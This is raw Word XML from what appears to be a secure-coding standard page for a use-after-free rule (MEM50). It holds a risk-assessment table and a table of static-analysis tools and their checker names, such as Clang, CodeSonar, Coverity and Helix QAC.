            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5B570099" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="33BED6A2" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3B3CD1A7" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2743D47A" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="63DEB54B" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="265C59C7" w14:textId="71382143" w:rsidR="00B475A1" w:rsidRDefault="001F6F14" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3FECF226" w14:textId="4762BB18" w:rsidR="00B475A1" w:rsidRDefault="001F6F14" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Likely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="001260E5" w14:textId="077535A5" w:rsidR="00B475A1" w:rsidRDefault="001F6F14" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5C1BD06F" w14:textId="51BF9F56" w:rsidR="00B475A1" w:rsidRDefault="001F6F14" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="321828B7" w14:textId="5F8F7417" w:rsidR="00B475A1" w:rsidRDefault="00501A4B"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BA7A045" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="78BC4E34" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B112A9B" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="447D030D" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5EC8B8B2" w14:textId="21578A2D" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId72" w:history="1">
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Astrée</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="55626CE3" w14:textId="19B0EB0A" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>22.10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BF833B5" w14:textId="2DB3B9FC" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pP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3BE4682B" w14:textId="62F2CF03" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="602D449B" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AEAE3DD" w14:textId="504B3686" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId73" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Axivion</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70345C77" w14:textId="36D20AEB" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23CC3080" w14:textId="2F48FCB5" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">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++-MEM50</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B6D6E4C" w14:textId="1E136AC5" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="07A3C3EB" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43ADD6D5" w14:textId="4AB9945C" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId74" w:history="1">
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Clang</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7F179220" w14:textId="031759B2" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>3.9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="464DD348" w14:textId="6139DCCB" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>clang-analyzer-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>cplusplus.NewDelete</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono" w:cs="Courier New"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>clang-analyzer-alpha.security.ArrayBoundV2 </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32AF3C29" w14:textId="1C6B25B2" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Checked by </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>clang-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="HTMLCode"/>
                <w:rFonts w:ascii="Roboto Mono" w:eastAsia="Calibri" w:hAnsi="Roboto Mono"/>
                <w:color w:val="172B4D"/>
              </w:rPr>
              <w:t>tidy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>, but</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> does not catch all violations of this rule.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="0451CC71" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="309FCBBD" w14:textId="576A143B" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId75" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D57E26E" w14:textId="09DC09A4" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F968ED2" w14:textId="6558601B" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>ALLOC.UAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DF1E7AE" w14:textId="63C98021" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Use after free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="47B6028B" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="511CB070" w14:textId="3512AC4E" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId76" w:history="1">
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Compass/ROSE</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54A9AB07" w14:textId="2868F757" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C130C6E" w14:textId="5DE597A0" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="51D0861E" w14:textId="4BF6B8DB" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="28EA5B38" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C8C5993" w14:textId="5347E160" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId77" w:history="1">
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Coverity</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F553665" w14:textId="526D940F" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>v7.5.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="231479F0" w14:textId="3618E2C2" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>USE_AFTER_FREE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6396BD55" w14:textId="2494B314" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Can detect the specific instances where memory is deallocated more than once or read/written to the target of a freed pointer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="16ADFD04" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41BA380E" w14:textId="570A47D3" w:rsidR="007421A2" w:rsidRDefault="00000000" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId78" w:history="1">
              <w:r w:rsidR="007421A2">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20053A38" w14:textId="7DF263A5" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0397349D" w14:textId="436AF9F7" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C++4303, C++4304</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ACA1C56" w14:textId="7A045D22" w:rsidR="007421A2" w:rsidRDefault="007421A2" w:rsidP="007421A2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007421A2" w14:paraId="0F156E4E" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
